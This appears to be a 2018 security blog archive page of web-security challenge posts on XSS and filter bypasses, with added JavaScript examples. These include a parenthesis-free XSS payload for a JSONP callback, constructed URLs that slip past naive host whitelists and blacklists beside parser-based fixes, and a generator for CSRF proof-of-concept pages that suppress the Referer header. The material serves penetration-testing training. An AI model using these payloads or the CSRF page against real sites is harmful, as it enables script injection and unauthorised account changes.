Posts

Showing posts from May, 2018

[Hone Your Ninja Skill] Whitelist filter bypass ("URL")

http://honeyourskills.ninja/target/data_restriction/?url=whitelist-filter-bypass-url.php

In input validation, a whitelisting approach is generally considered better than a blacklisting one. Yet a non-robust whitelist implementation can still let an attacker bypass your defense.

[Hone Your Ninja Skill] Simple Tactical XSS Filter Bypass

Mission: Achieve script execution when submitting form.
Hint: It is simple. Just a matter of tactics, techniques, and procedures.

http://honeyourskills.ninja/target/simple-tactical-xss-filter-bypass.php

[Hone Your Ninja Skill] Blacklist filter bypass on < > and =

Mission: Achieve arbitrary script execution when clicking the link below.
http://honeyourskills.ninja/target/blacklist-filter-bypass-bracket-allowed.php

[Hone Your Ninja Skill] Blacklist filter bypass on > < ( ) and =

Mission: Achieve arbitrary script execution when clicking the link below.
http://honeyourskills.ninja/target/blacklist-filter-bypass-bracket-equal.php?callback=printToPage

[Hone Your Ninja Skill] Blacklist filter bypass on > < ( and )

Mission: Bypass the "( )" character restriction and achieve script execution.
http://honeyourskills.ninja/target/blacklist-filter-bypass-bracket.php?callback=printToPage
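The three bracket challenges above all block some mix of < > ( ) and =. The example below is an added illustration and is not code from the challenge pages; how those pages actually reflect the callback is not reproduced here. It assumes (an assumption, not something the challenges state) that the callback parameter is reflected verbatim into a JSONP-style script body of the form callback(json), and it shows one general technique: a tagged template literal calls a function without parentheses, so a payload needs none of the blocked characters.

```javascript
// Added example, not code from the Hone Your Ninja Skill challenges.
// Assumptions (not taken from the challenge pages): the "callback" query
// parameter is reflected verbatim into a JSONP-style script body
// "<callback>(<json>)", and the filter rejects the characters < > ( ) =.
// The point demonstrated: a tagged template literal invokes a function
// without parentheses, so none of the blocked characters are needed.

const BLOCKED_CHARS = ['<', '>', '(', ')', '='];

// Blacklist as assumed above: reject the value if it contains any blocked char.
function passesBlacklist(value) {
  return !BLOCKED_CHARS.some((c) => value.includes(c));
}

// Simulated vulnerable endpoint: builds the script the browser would execute.
function jsonpResponse(callback, data) {
  if (!passesBlacklist(callback)) {
    throw new Error('callback rejected by blacklist');
  }
  return `${callback}(${JSON.stringify(data)})`;
}

// Execute a script body the way a <script> tag would, but with a recording
// stand-in for alert and a stub printToPage, and report what alert received.
function runScript(body) {
  const alertCalls = [];
  // A tagged template call passes the template strings array as the first argument.
  const alert = (first) => { alertCalls.push(first); };
  const printToPage = (obj) => obj;
  new Function('alert', 'printToPage', body)(alert, printToPage);
  return alertCalls;
}

// Payload: calls alert via a tagged template, then hands the JSON to the
// real callback so the page keeps behaving normally afterwards.
// Contains none of < > ( ) =.
const PAYLOAD = 'alert`1`;printToPage';

// Convenience: returns what alert saw when the payload is reflected.
function demonstrate() {
  // Resulting script body: alert`1`;printToPage({"msg":"hello"})
  const body = jsonpResponse(PAYLOAD, { msg: 'hello' });
  return runScript(body);
}
```

In a real browser, alert receives the template strings array ["1"] and displays it as "1". The same idea applies to any function reachable by name in the reflected context; what changes between the three challenges is only which characters the payload may not contain, and a tagged template avoids all of them.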

[Hone Your Ninja Skill] Blacklist filter bypass ("domain name")

Mission: Try submitting an equivalent of the blacklisted word "yehg.net" in the form below, just for fun:

http://honeyourskills.ninja/target/blacklist-filter-bypass-domain.php
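The two host-name challenges on this page, the whitelist filter bypass ("URL") above and this domain-name blacklist, fail for the same reason: the check compares raw strings instead of the host the browser will actually use. The example below is added here and is not code from the challenge pages; it puts a naive string-based check beside a parser-based one. ALLOWED_HOST is an assumed placeholder, the sample URLs are constructed, and only "yehg.net" comes from the challenge text.

```javascript
// Added example, not code from the Hone Your Ninja Skill challenges.
// It illustrates both the "whitelist filter bypass (URL)" and the
// "blacklist filter bypass (domain name)" posts with a naive string-based
// check beside a parser-based one. ALLOWED_HOST is an assumed placeholder;
// BLOCKED_HOST is the word blacklisted in the domain-name challenge.
// All sample URLs below are constructed.

const ALLOWED_HOST = 'trusted.example.com'; // assumption, not from the page
const BLOCKED_HOST = 'yehg.net';

// Naive whitelist: raw string prefix match.
function naiveWhitelist(url) {
  return url.startsWith('https://' + ALLOWED_HOST);
}

// Naive blacklist: raw, case-sensitive substring match. true = accepted.
function naiveBlacklist(url) {
  return !url.includes(BLOCKED_HOST);
}

// Canonical host name: parse with the WHATWG URL parser (which lowercases the
// host and separates userinfo from it), fold compatibility characters such as
// fullwidth letters with NFKC, and drop a trailing dot. Returns null for
// anything that is not an http(s) URL.
function canonicalHost(url) {
  let parsed;
  try {
    parsed = new URL(String(url).normalize('NFKC'));
  } catch (e) {
    return null;
  }
  if (parsed.protocol !== 'https:' && parsed.protocol !== 'http:') return null;
  return parsed.hostname.toLowerCase().replace(/\.$/, '');
}

// Robust whitelist: exact match on the canonical host.
function strictWhitelist(url) {
  return canonicalHost(url) === ALLOWED_HOST;
}

// Robust blacklist: reject the canonical host and any subdomain of it.
function strictBlacklist(url) {
  const host = canonicalHost(url);
  return host !== null && host !== BLOCKED_HOST && !host.endsWith('.' + BLOCKED_HOST);
}

// Constructed inputs that slip past the naive checks.
const WHITELIST_BYPASSES = [
  'https://trusted.example.com.evil.test/', // allowed host as a leading label of another host
  'https://trusted.example.com@evil.test/', // allowed host as userinfo, real host is evil.test
];
const BLACKLIST_EQUIVALENTS = [
  'https://YEHG.NET/',        // case
  'https://ｙｅｈｇ.ｎｅｔ/',     // fullwidth letters, NFKC-folds to ASCII yehg.net
];

// Returns, for each sample, the naive and the strict decision side by side.
function compare() {
  return {
    whitelist: WHITELIST_BYPASSES.map((u) => [u, naiveWhitelist(u), strictWhitelist(u)]),
    blacklist: BLACKLIST_EQUIVALENTS.map((u) => [u, naiveBlacklist(u), strictBlacklist(u)]),
  };
}
```

The parser-based versions decide on the same host the browser resolves, which is what makes them robust; the naive ones decide on the bytes the attacker typed. Whether a trailing dot, mixed case or a Unicode look-alike counts as "equivalent" depends on what consumes the value downstream, so canonicalize the way that consumer does before comparing.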

Does your app properly destroy session?


Bypassing referrer check with no script involved

No need for a scripting approach like https://github.com/knu/noreferrer any more.

This meta tag is useful when preparing a CSRF PoC against an application that checks the Referer header:
<meta name="referrer" content="no-referrer">
It only helps where the check accepts a request that carries no Referer at all; a check that rejects a missing header is not bypassed this way.

https://caniuse.com/#feat=referrer-policy
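As an added example, not code from the original post, here is a small generator for a CSRF proof-of-concept page that carries the meta tag above. The target URL and form fields are constructed sample data; the only real behaviour relied on is that a browser honouring the referrer meta tag sends the auto-submitted form without a Referer header.

```javascript
// Added example, not from the original post: generates a CSRF PoC page that
// suppresses the Referer header with <meta name="referrer" content="no-referrer">.
// The target URL and fields passed in by the caller are sample data.

// Escape a value for use inside an HTML attribute so that a field value
// containing quotes or angle brackets cannot break out of the PoC markup.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Build the PoC page. fields is a plain object of form field name -> value.
// autoSubmit adds a script that submits the form as soon as the page loads.
function csrfPocPage(action, fields, { method = 'POST', autoSubmit = true } = {}) {
  const inputs = Object.entries(fields).map(
    ([name, value]) =>
      `    <input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`,
  );
  const lines = [
    '<!DOCTYPE html>',
    '<html>',
    '<head>',
    '  <meta charset="utf-8">',
    // The referrer policy must be in effect before the form is submitted,
    // hence it lives in <head>.
    '  <meta name="referrer" content="no-referrer">',
    '</head>',
    '<body>',
    `  <form id="csrf" method="${escapeHtml(method)}" action="${escapeHtml(action)}">`,
    ...inputs,
    '    <input type="submit" value="Submit request">',
    '  </form>',
  ];
  if (autoSubmit) {
    lines.push('  <script>document.getElementById("csrf").submit();</script>');
  }
  lines.push('</body>', '</html>');
  return lines.join('\n');
}

// Sample PoC against a constructed target; the vulnerable endpoint and
// parameter names are invented for illustration.
function samplePoc() {
  return csrfPocPage('https://target.example/account/email', {
    email: 'attacker@evil.test',
  });
}
```

Save the output as an .html file and open it in the victim's browser to verify the request arrives at the target with no Referer header (check it in the proxy). If the application instead insists that a Referer be present, this PoC will be rejected and the meta tag is not the right tool.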

When your XSS finding does NOT impress

If your clients or stakeholders are not convinced by an XSS finding, demonstrating its impact with BeEF or with a simple executable-download payload can help:
Exe Download POC: https://lnkd.in/fWF_nEK
BeEF: http://beefproject.com/